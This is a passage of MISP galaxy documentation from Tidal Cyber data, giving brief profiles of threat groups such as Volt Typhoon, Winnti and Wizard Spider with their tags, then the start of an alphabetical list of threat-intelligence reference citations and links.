Lebanese Cedar - Associated Group

<sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup>

The tag is: misp-galaxy:groups="Lebanese Cedar - Associated Group"

Volatile Cedar

[Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) has been operating since 2012 and is motivated by political and ideological interests.<sup>[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)]</sup><sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup>

The tag is: misp-galaxy:groups="Volatile Cedar"

Volt Typhoon - Tidal

Volt Typhoon is a China state-backed threat actor that has targeted critical infrastructure organizations in a range of specific sectors in Guam and elsewhere in the United States since mid-2021. Its activities primarily focus on espionage and information gathering. Researchers indicate the group is focused on maintaining stealth and persistence in victim networks for as long as possible, leveraging a large number of living-off-the-land techniques to accomplish these goals. Researchers assessed with moderate confidence that Volt Typhoon’s activities are focused on developing capabilities that could disrupt communications infrastructure between the United States and entities in Asia in the event of a potential geopolitical crisis.<sup>[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]</sup>

Related Vulnerabilities: CVE-2021-40539, CVE-2021-27860<sup>[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]</sup>

The tag is: misp-galaxy:groups="Volt Typhoon - Tidal"

BRONZE SILHOUETTE - Associated Group

<sup>[[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]</sup>

The tag is: misp-galaxy:groups="BRONZE SILHOUETTE - Associated Group"

Vanguard Panda - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Vanguard Panda - Associated Group"

Dev-0391 - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Dev-0391 - Associated Group"

UNC3236 - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="UNC3236 - Associated Group"

Voltzite - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Voltzite - Associated Group"

Insidious Taurus - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Insidious Taurus - Associated Group"

Volt Typhoon

[Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) is a People’s Republic of China (PRC) state-sponsored actor that has been active since at least 2021. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) typically focuses on espionage and information gathering and has targeted critical infrastructure organizations in the US including Guam. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.<sup>[[Microsoft Volt Typhoon May 2023](https://app.tidalcyber.com/references/8b74f0b7-9719-598c-b3ee-61d734393e6f)]</sup><sup>[[Joint Cybersecurity Advisory Volt Typhoon June 2023](https://app.tidalcyber.com/references/14872f08-e219-5c0d-a2d7-43a3ba348b4b)]</sup><sup>[[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]</sup>

The tag is: misp-galaxy:groups="Volt Typhoon"

Whitefly

[Whitefly](https://app.tidalcyber.com/groups/f0943620-7bbb-4239-8ed3-c541c36baaa1) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.<sup>[[Symantec Whitefly March 2019](https://app.tidalcyber.com/references/d0e48356-36d9-4b4c-b621-e3c4404378d2)]</sup>

The tag is: misp-galaxy:groups="Whitefly"

Windigo

The [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) operators continued updating [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) through 2019.<sup>[[ESET Windigo Mar 2014](https://app.tidalcyber.com/references/721cdb36-d3fc-4212-b324-6be2b5f9cb46)]</sup><sup>[[CERN Windigo June 2019](https://app.tidalcyber.com/references/e9f1289f-a32e-441c-8787-cb32a26216d1)]</sup>

The tag is: misp-galaxy:groups="Windigo"

Bahamut - Associated Group

The tag is: misp-galaxy:groups="Bahamut - Associated Group"

Windshift

[Windshift](https://app.tidalcyber.com/groups/4e880d01-313a-4926-8470-78c48824aa82) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.<sup>[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)]</sup><sup>[[objective-see windtail1 dec 2018](https://app.tidalcyber.com/references/7a32c962-8050-45de-8b90-8644be5109d9)]</sup><sup>[[objective-see windtail2 jan 2019](https://app.tidalcyber.com/references/e6bdc679-ee0c-4f34-b5bc-0d6a26485b36)]</sup>

The tag is: misp-galaxy:groups="Windshift"

Blackfly - Associated Group

The tag is: misp-galaxy:groups="Blackfly - Associated Group"

Winnti Group

[Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.<sup>[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)]</sup><sup>[[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)]</sup><sup>[[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]</sup> Some reporting suggests a number of other groups, including [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca), [APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094), and [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8), are closely linked to [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).<sup>[[401 TRG Winnti Umbrella May 2018](https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]</sup>

The tag is: misp-galaxy:groups="Winnti Group"

WIRTE

[WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) is a threat group that has been active since at least August 2018. [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.<sup>[[Lab52 WIRTE Apr 2019](https://app.tidalcyber.com/references/884b675e-390c-4f6d-8cb7-5d97d84115e5)]</sup><sup>[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]</sup>

The tag is: misp-galaxy:groups="WIRTE"

TEMP.MixMaster - Associated Group

<sup>[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]</sup>

The tag is: misp-galaxy:groups="TEMP.MixMaster - Associated Group"

Grim Spider - Associated Group

The tag is: misp-galaxy:groups="Grim Spider - Associated Group"

UNC1878 - Associated Group

<sup>[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]</sup>

The tag is: misp-galaxy:groups="UNC1878 - Associated Group"

FIN12 - Associated Group

The tag is: misp-galaxy:groups="FIN12 - Associated Group"

GOLD BLACKBURN - Associated Group

<sup>[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]</sup>

The tag is: misp-galaxy:groups="GOLD BLACKBURN - Associated Group"

ITG23 - Associated Group

The tag is: misp-galaxy:groups="ITG23 - Associated Group"

Periwinkle Tempest - Associated Group

<sup>[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]</sup>

The tag is: misp-galaxy:groups="Periwinkle Tempest - Associated Group"

Wizard Spider

[Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) since at least 2016. [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup><sup>[[DHS/CISA Ransomware Targeting Healthcare October 2020](https://app.tidalcyber.com/references/984e86e6-32e4-493c-8172-3d29de4720cc)]</sup><sup>[[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]</sup>

The tag is: misp-galaxy:groups="Wizard Spider"

APT31 - Associated Group

<sup>[[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]</sup>

The tag is: misp-galaxy:groups="APT31 - Associated Group"

ZIRCONIUM

[ZIRCONIUM](https://app.tidalcyber.com/groups/5e34409e-2f55-4384-b519-80747d02394c) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.<sup>[[Microsoft Targeting Elections September 2020](https://app.tidalcyber.com/references/1d7070fd-01be-4776-bb21-13368a6173b1)]</sup><sup>[[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]</sup>

The tag is: misp-galaxy:groups="ZIRCONIUM"

Tidal References

Tidal References Cluster.

Tidal References is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

D3Secutrity CTI Feeds

Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="D3Secutrity CTI Feeds"

Table 12397. Table References

Links

https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

Linux Logs

Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.

The tag is: misp-galaxy:references="Linux Logs"

Table 12398. Table References

Links

https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/

Netspi PowerShell Execution Policy Bypass

Sutherland, S. (2014, September 9). 15 Ways to Bypass the PowerShell Execution Policy. Retrieved July 23, 2015.

The tag is: misp-galaxy:references="Netspi PowerShell Execution Policy Bypass"

Table 12399. Table References

Links

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

Mandiant-leaks

DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="Mandiant-leaks"

Table 12400. Table References

Links

https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs

Tilbury Windows Credentials

Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Tilbury Windows Credentials"

Table 12401. Table References

Links

https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf

CWE top 25

Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="CWE top 25"

Table 12402. Table References

Links

https://cwe.mitre.org/top25/index.html

CrowdStrike 2015 Global Threat Report

CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="CrowdStrike 2015 Global Threat Report"

Table 12403. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf

Prolific OSX Malware History

Bit9 + Carbon Black Threat Research Team. (2015). 2015: The Most Prolific Year in History for OS X Malware. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Prolific OSX Malware History"

Table 12404. Table References

Links

https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf

CERN Windigo June 2019

CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="CERN Windigo June 2019"

Table 12405. Table References

Links

https://security.web.cern.ch/advisories/windigo/windigo.shtml

CrowdStrike GTR 2019

CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="CrowdStrike GTR 2019"

Table 12406. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf

Crowdstrike GTR2020 Mar 2020

Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.

The tag is: misp-galaxy:references="Crowdstrike GTR2020 Mar 2020"

Table 12407. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

RecordedFuture 2021 Ad Infra

Insikt Group. (2022, January 18). 2021 Adversary Infrastructure Report. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="RecordedFuture 2021 Ad Infra"

Table 12408. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

Red Canary 2021 Threat Detection Report March 2021

Red Canary. (2021, March 31). 2021 Threat Detection Report. Retrieved August 31, 2021.

The tag is: misp-galaxy:references="Red Canary 2021 Threat Detection Report March 2021"

Table 12409. Table References

Links

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf?mkt_tok=MDAzLVlSVS0zMTQAAAF_PIlmhNTaG2McG4X_foM-cIr20UfyB12MIQ10W0HbtMRwxGOJaD0Xj6CRTNg_S-8KniRxtf9xzhz_ACvm_TpbJAIgWCV8yIsFgbhb8cuaZA

ACSC BlackCat Apr 2022

Australian Cyber Security Centre. (2022, April 14). 2022-004: ACSC Ransomware Profile - ALPHV (aka BlackCat). Retrieved December 20, 2022.

The tag is: misp-galaxy:references="ACSC BlackCat Apr 2022"

Table 12410. Table References

Links

https://www.cyber.gov.au/about-us/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat

Internet crime report 2022

IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="Internet crime report 2022"

Table 12411. Table References

Links

https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf

RC PowerShell

Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="RC PowerShell"

Table 12412. Table References

Links

https://redcanary.com/threat-detection-report/techniques/powershell/

20 macOS Common Tools and Techniques

Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.

The tag is: misp-galaxy:references="20 macOS Common Tools and Techniques"

Table 12413. Table References

Links

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Microsoft GPP Key

Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Microsoft GPP Key"

Table 12414. Table References

Links

https://msdn.microsoft.com/library/cc422924.aspx

Microsoft _VBA_PROJECT Stream

Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.

The tag is: misp-galaxy:references="Microsoft _VBA_PROJECT Stream"

Table 12415. Table References

Links

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239

Microsoft Learn

Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Microsoft Learn"

Table 12416. Table References

Links

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1

Hybrid Analysis Icacls2 May 2018

Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="Hybrid Analysis Icacls2 May 2018"

Table 12417. Table References

Links

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

Microsoft Wow6432Node 2018

Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.

The tag is: misp-galaxy:references="Microsoft Wow6432Node 2018"

Table 12418. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry

DOJ-DPRK Heist

Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="DOJ-DPRK Heist"

Table 12419. Table References

Links

https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and

ITWorld Hard Disk Health Dec 2014

Pinola, M. (2014, December 14). 3 tools to check your hard drive’s health and make sure it’s not already dying on you. Retrieved October 2, 2018.

The tag is: misp-galaxy:references="ITWorld Hard Disk Health Dec 2014"

Table 12420. Table References

Links

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

Microsoft 4657 APR 2017

Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="Microsoft 4657 APR 2017"

Table 12421. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657

Microsoft 4697 APR 2017

Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Microsoft 4697 APR 2017"

Table 12422. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697

Microsoft User Creation Event

Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="Microsoft User Creation Event"

Table 12423. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Microsoft User Modified Event

Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="Microsoft User Modified Event"

Table 12424. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738

Microsoft 4768 TGT 2017

Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Microsoft 4768 TGT 2017"

Table 12425. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768

HIPAA Journal S3 Breach, 2017

HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="HIPAA Journal S3 Breach, 2017"

Table 12426. Table References

Links

https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/

Slack Security Risks

Michael Osakwe. (2020, November 18). 4 SaaS and Slack Security Risks to Consider. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Slack Security Risks"

Table 12427. Table References

Links

https://www.nightfall.ai/blog/saas-slack-security-risks-2020

PurpleSec Data Loss Prevention

Michael Swanagan. (2020, October 24). 7 Data Loss Prevention Best Practices & Strategies. Retrieved August 30, 2021.

The tag is: misp-galaxy:references="PurpleSec Data Loss Prevention"

Table 12428. Table References

Links

https://purplesec.us/data-loss-prevention/

7zip Homepage

I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="7zip Homepage"

Table 12429. Table References

Links

https://www.7-zip.org/

MicroFocus 9002 Aug 2016

Petrovsky, O. (2016, August 30). “9002 RAT” — a second building on the left. Retrieved February 20, 2018.

The tag is: misp-galaxy:references="MicroFocus 9002 Aug 2016"

Table 12430. Table References

Links

https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ

CISA AA21-200A APT40 July 2021

CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.

The tag is: misp-galaxy:references="CISA AA21-200A APT40 July 2021"

Table 12431. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

AADInternals

Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="AADInternals"

Table 12432. Table References

Links

https://o365blog.com/aadinternals/

AADInternals Documentation

Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022.

The tag is: misp-galaxy:references="AADInternals Documentation"

Table 12433. Table References

Links

https://o365blog.com/aadinternals

AADInternals Github

Dr. Nestori Syynimaa. (2021, December 13). AADInternals. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="AADInternals Github"

Table 12434. Table References

Links

https://github.com/Gerenios/AADInternals

Gigamon BADHATCH Jul 2019

Savelesky, K., et al. (2019, July 23). ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8’s Tooling. Retrieved September 8, 2021.

The tag is: misp-galaxy:references="Gigamon BADHATCH Jul 2019"

Table 12435. Table References

Links

https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/

bad_luck_blackcat

Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.

The tag is: misp-galaxy:references="bad_luck_blackcat"

Table 12436. Table References

Links

https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf

Cybereason Bazar July 2020

Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.

The tag is: misp-galaxy:references="Cybereason Bazar July 2020"

Table 12437. Table References

Links

https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles

Red Canary Hospital Thwarted Ryuk October 2020

Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.

The tag is: misp-galaxy:references="Red Canary Hospital Thwarted Ryuk October 2020"

Table 12438. Table References

Links

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

CyberCX Anonymous Sudan June 19 2023

CyberCX Intelligence. (2023, June 19). A bear in wolf’s clothing: Insights into the infrastructure used by Anonymous Sudan to attack Australian organisations. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="CyberCX Anonymous Sudan June 19 2023"

Table 12439. Table References

Links

https://cybercx.com.au/blog/a-bear-in-wolfs-clothing/

Netskope Cloud Phishing

Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Netskope Cloud Phishing"

Table 12440. Table References

Links

https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service

Microsoft O365 Admin Roles

Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et al. (2019, October 8). About admin roles. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Microsoft O365 Admin Roles"

Table 12441. Table References

Links

https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

Microsoft Atom Table

Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.

The tag is: misp-galaxy:references="Microsoft Atom Table"

Table 12442. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx

Microsoft About BITS

Microsoft. (2019, July 12). About BITS. Retrieved March 16, 2020.

The tag is: misp-galaxy:references="Microsoft About BITS"

Table 12443. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/bits/about-bits

Microsoft About Event Tracing 2018

Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.

The tag is: misp-galaxy:references="Microsoft About Event Tracing 2018"

Table 12444. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events

Microsoft PowerShell Command History

Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.

The tag is: misp-galaxy:references="Microsoft PowerShell Command History"

Table 12445. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7

Microsoft List View Controls

Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.

The tag is: misp-galaxy:references="Microsoft List View Controls"

Table 12446. Table References

Links

https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview

Microsoft PowerShell Logging

Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft PowerShell Logging"

Table 12447. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7

Apple About Mac Scripting 2016

Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Apple About Mac Scripting 2016"

Table 12448. Table References

Links

https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html

PowerShell About 2019

Wheeler, S. et al. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="PowerShell About 2019"

Table 12449. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1

Microsoft PowerShellB64

Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Microsoft PowerShellB64"

Table 12450. Table References

Links

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand

Microsoft Profiles

Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.

The tag is: misp-galaxy:references="Microsoft Profiles"

Table 12451. Table References

Links

https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles

Microsoft About Profiles

Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="Microsoft About Profiles"

Table 12452. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6

Microsoft Remote Desktop Services

Microsoft. (2019, August 23). About Remote Desktop Services. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="Microsoft Remote Desktop Services"

Table 12453. Table References

Links

https://docs.microsoft.com/windows/win32/termserv/about-terminal-services

MSDN Clipboard

Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.

The tag is: misp-galaxy:references="MSDN Clipboard"

Table 12454. Table References

Links

https://msdn.microsoft.com/en-us/library/ms649012

Microsoft HTML Help Executable Program

Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft HTML Help Executable Program"

Table 12455. Table References

Links

https://msdn.microsoft.com/windows/desktop/ms524405

About UEFI

UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.

The tag is: misp-galaxy:references="About UEFI"

Table 12456. Table References

Links

http://www.uefi.org/about

Microsoft Window Classes

Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft Window Classes"

Table 12457. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx

Picus Sodinokibi January 2020

Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.

The tag is: misp-galaxy:references="Picus Sodinokibi January 2020"

Table 12458. Table References

Links

https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware

